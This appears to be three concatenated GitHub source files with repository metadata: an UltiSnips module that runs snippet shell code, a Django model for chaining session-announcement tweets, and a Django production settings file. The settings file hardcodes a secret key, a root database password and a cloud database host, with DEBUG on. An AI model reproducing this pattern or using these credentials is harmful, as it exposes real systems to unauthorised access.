"""Find an executable tmp directory."""
userdir = os.path.expanduser("~")
for testdir in [tempfile.gettempdir(), os.path.join(userdir, '.cache'),
os.path.join(userdir, '.tmp'), userdir]:
if (not os.path.exists(testdir) or
not _run_shell_command('echo success', testdir) == 'success'):
continue
return testdir
return ''
class ShellCode(NoneditableTextObject):
"""See module docstring."""
def __init__(self, parent, token):
NoneditableTextObject.__init__(self, parent, token)
self._code = token.code.replace("\\`", "`")
self._tmpdir = _get_tmp()
def _update(self, done):
if not self._tmpdir:
output = \
"Unable to find executable tmp directory, check noexec on /tmp"
else:
output = _run_shell_command(self._code, self._tmpdir)
self.overwrite(output)
self._parent._del_child(self) # pylint:disable=protected-access
return True
|
{
"content_hash": "7b1a5f72d3523a14cffc478aa8a23a79",
"timestamp": "",
"source": "github",
"line_count": 68,
"max_line_length": 79,
"avg_line_length": 32.720588235294116,
"alnum_prop": 0.6202247191011236,
"repo_name": "marshnmedia/dotfiles",
"id": "3e9099a6fb7c980581dc6fbbcfae875c148a0ef9",
"size": "2266",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": ".vim/bundle/ultisnips.vim/pythonx/UltiSnips/text_objects/_shell_code.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "308"
},
{
"name": "Python",
"bytes": "281550"
},
{
"name": "Ruby",
"bytes": "3120"
},
{
"name": "Shell",
"bytes": "16113"
},
{
"name": "Vim script",
"bytes": "985488"
}
],
"symlink_target": ""
}
|
from django.db import models
from django.template.defaultfilters import truncatechars
from django.utils import timezone
from sked.models import Event, Session
from twit.threads import SendTweetThread
class TweetTooLongError(Exception):
def __init__(self, msg=None):
self.msg = msg
if not self.msg:
self.msg = 'Adding this session would result in a tweet longer than 140 characters.'
class AlreadyAssignedError(Exception):
def __init__(self, msg=None):
self.msg = msg
if not self.msg:
self.msg = 'This session already belongs to a tweet in this sequence.'
class Tweet(models.Model):
sent_at = models.DateTimeField(blank=True, null=True)
class Meta:
abstract = True
def send(self):
# ''' This is weird. It can only be called from the first tweet in
# a series, raising NotImplementedError if called on a non-initial tweet.
# It spins off a thread to make the actual api calls, which
# manages state within the series.
# '''
if self.previous:
raise NotImplementedError('Serial tweets can only be sent from the beginning.')
SendTweetThread(self).start()
@property
def is_sent(self):
return self.sent_at is not None
class SessionBlockTweetManager(models.Manager):
def unsent(qs):
return qs.filter(sent_at=None, previous=None)
class SessionBlockTweet(Tweet):
timeslot = models.DateTimeField()
event = models.ForeignKey(Event, related_name="session_tweets")
session_ids = models.CommaSeparatedIntegerField(max_length=128,
blank=True, default="")
previous = models.OneToOneField('SessionBlockTweet', blank=True,
null=True, unique=True, related_name="next")
objects = SessionBlockTweetManager()
class Meta:
ordering = ('-timeslot', 'id')
def __unicode__(self):
try:
return 'Tweet %s of %s for %s at %s' % (
self.index + 1, self.total, self.timeslot, self.event)
except:
return 'Tweet for %s at %s' % (self.timeslot, self.event)
def touch(self):
self._seq = None
self._sessions = None
def get_sequence(self):
try:
if self._seq is not None:
return self._seq
except AttributeError:
pass
seq = []
cursor = self
while cursor.previous:
cursor = cursor.previous
seq.append(cursor)
while True:
try:
cursor = cursor.next
seq.append(cursor)
except SessionBlockTweet.DoesNotExist:
break
self._seq = seq
return self.get_sequence()
def first_in_sequence(self):
seq = self.get_sequence()
return seq[0]
def get_session_ids(self):
try:
return [int(id) for id in self.session_ids.split(',')]
except:
return []
def add_session(self, session):
if self.length < 140:
assigned = [id for tweet in self.get_sequence() for id in tweet.get_session_ids()]
if session.id in assigned:
raise AlreadyAssignedError()
locally_assigned = self.get_session_ids()
locally_assigned.append(session.id)
self.session_ids = ','.join([str(id) for id in locally_assigned])
self.touch()
if self.length > 140:
if self.sessions.count() > 1:
self.remove_session(session)
raise TweetTooLongError()
else:
raise TweetTooLongError()
def remove_session(self, session):
self.session_ids = ','.join([str(id) for
id in self.get_session_ids() if
id != session.id])
self.touch()
@property
def sessions(self):
try:
if self._sessions is not None:
return self._sessions
except AttributeError:
pass
try:
self._sessions = Session.objects.filter(id__in=self.get_session_ids())
except ValueError:
self._sessions = Session.objects.none()
return self.sessions
@property
def index(self):
seq = self.get_sequence()
return seq.index(self)
@property
def is_first(self):
return self.previous is None
@property
def is_last(self):
try:
return self.next is None
except SessionBlockTweet.DoesNotExist:
return True
@property
def total(self):
seq = self.get_sequence()
return len(seq)
@property
def text(self):
txt = u''
if self.is_first:
txt += u'Coming up at %s: ' % (self.timeslot
.astimezone(timezone.get_current_timezone())
.strftime('%-I:%M'))
txt += u', '.join(['%s (%s)' % (truncatechars(s.title, 120) if
self.sessions.count() is 1 else
s.title, s.location.name) for
s in self.sessions])
return txt
@property
def length(self):
return len(self.text)
|
{
"content_hash": "cd3df1f2f48b6890e15789b8753ab649",
"timestamp": "",
"source": "github",
"line_count": 176,
"max_line_length": 96,
"avg_line_length": 30.84659090909091,
"alnum_prop": 0.5479830539694235,
"repo_name": "sunlightlabs/tcamp",
"id": "a371326020796149585a967836fda99a61f30ba8",
"size": "5429",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tcamp/twit/models.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "191488"
},
{
"name": "HTML",
"bytes": "832187"
},
{
"name": "JavaScript",
"bytes": "86789"
},
{
"name": "Python",
"bytes": "703083"
},
{
"name": "Shell",
"bytes": "623"
}
],
"symlink_target": ""
}
|
"""
Django settings for campaignserver project.
For more information on this file, see
https://docs.djangoproject.com/en/1.7/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.7/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.7/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'k-(62ls@8owkmo72ipb_x-#9zgt#!59+8^5kw(rf3yatpmou%h'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
TEMPLATE_DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'dataserver',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'campaignserver.urls'
WSGI_APPLICATION = 'campaignserver.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.7/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.mysql',
'NAME': 'followthemoney',
'USER': 'root',
'PASSWORD': 'followthemoney',
'HOST': 'followthemoney.chwj19dbxodd.us-east-1.rds.amazonaws.com',
'PORT': '3306',
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.7/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
'django.template.loaders.eggs.Loader',
)
# List of finder classes that know how to find static files in
# various locations.
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
)
STATIC_URL = '/static/'
|
{
"content_hash": "42154eb4dbf891ebebaf42a74f35de2b",
"timestamp": "",
"source": "github",
"line_count": 97,
"max_line_length": 74,
"avg_line_length": 26.010309278350515,
"alnum_prop": 0.7225525168450257,
"repo_name": "follownjmoney/campaign-server",
"id": "3be0863eff355be0aff2320b7a43eb0609c75255",
"size": "2523",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "campaignserver/campaignserver/settings_prod.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "HTML",
"bytes": "1374"
},
{
"name": "Python",
"bytes": "12979"
}
],
"symlink_target": ""
}
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.